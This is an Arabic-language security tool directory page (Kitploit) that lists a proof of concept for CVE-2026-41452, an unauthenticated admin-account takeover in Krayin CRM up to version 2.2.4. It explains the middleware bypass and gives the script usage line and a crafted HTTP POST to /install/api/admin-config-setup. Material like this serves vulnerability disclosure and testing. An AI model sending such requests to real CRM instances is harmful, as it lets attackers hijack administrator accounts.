Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41452-poc — إثبات مفهوم استغلال لـ CVE-2026-41452، وهو تجاوز حرج للمصادقة في Krayin CRM <= 2.2.4 يسمح بالاستيلاء على حساب المسؤول دون مصادقة عبر تجاوز البرمجيات الوسيطة. | Kitploit
أدوات/GitHubGitHub/o-sec/cve-2026-41452-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقة
GitHubo-sec/cve-2026-41452-poc

CVE-2026-41452-poc

إثبات مفهوم استغلال لـ CVE-2026-41452، وهو تجاوز حرج للمصادقة في Krayin CRM <= 2.2.4 يسمح بالاستيلاء على حساب المسؤول دون مصادقة عبر تجاوز البرمجيات الوسيطة.

عرض المستودع
منذ 13س 23دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41452: الاستيلاء على حساب مسؤول Krayin CRM عبر تجاوز Middleware

CVSS v3.1: 9.8 Critical Target: Krayin CRM <= 2.2.4 License: MIT

إثبات مفهوم (PoC) يوضح ثغرة حرجة تتعلق بغياب المصادقة (CVE-2026-41452) تؤثر على Krayin CRM الإصدار 2.2.4 والإصدارات الأقدم.

تسمح هذه الثغرة للمهاجمين عن بُعد غير المصادق عليهم بتجاوز منطق middleware الخاص بالتثبيت في التطبيق (CanInstall) عبر حقن ترويسات HTTP محددة، مما يؤدي إلى استبدال كامل لإعدادات حساب المسؤول الرئيسي.

[!WARNING]
إخلاء المسؤولية: هذا المستودع والمعلومات الواردة فيه مُقدَّمة حصريًا لأغراض تعليمية، والبحث الأمني، والتدقيق الدفاعي المصرح به. يُعد الاختبار أو الاستغلال غير المصرح به لأنظمة الحاسوب غير قانوني بشكل صارم. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذه المواد.


نظرة عامة على الثغرة

  • معرّف CVE: CVE-2026-41452

  • نوع الثغرة: غياب المصادقة / تجاوز Middleware

  • حرجة (CVSS 9.8)

الخطورة:
  • البرنامج المتأثر: Krayin CRM <= 2.2.4

  • الإصدار المُصحَّح: Krayin CRM >= 2.2.5

  • الوصف التقني

    تكمن الثغرة في middleware الإعداد الخاص بالتطبيق. يمكن لمهاجم غير مصادق عليه إضافة ترويسة X-Requested-With: XMLHttpRequest إلى حمولة مُصمَّمة تستهدف نقطة النهاية /install/api/admin-config-setup. يؤدي هذا إلى تعطيل فحص إعادة التوجيه المتوقع داخل middleware CanInstall، مما يكشف عن عملية قاعدة بيانات updateOrInsert غير مصادق عليها تستهدف المعرّف الثابت (1) الخاص بمسؤول النظام الرئيسي.


    إثبات المفهوم (PoC)

    الاستخدام

    شغّل السكربت ضد نسخة هدف مصرح لك باختبارها:

    root@kitploit:~
    ./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
    

    مثال على طلب HTTP

    في الخلفية، يتم تفعيل التجاوز عبر بنية معاملة HTTP التالية:

    root@kitploit:~
    POST /install/api/admin-config-setup HTTP/1.1
    Host: target-crm.local
    X-Requested-With: XMLHttpRequest
    Content-Type: application/x-www-form-urlencoded
    
    name=test1&[email protected]&password=Password123
    

    المراجع

    • nist cve-2026-41452 detail
    تنزيل الأداة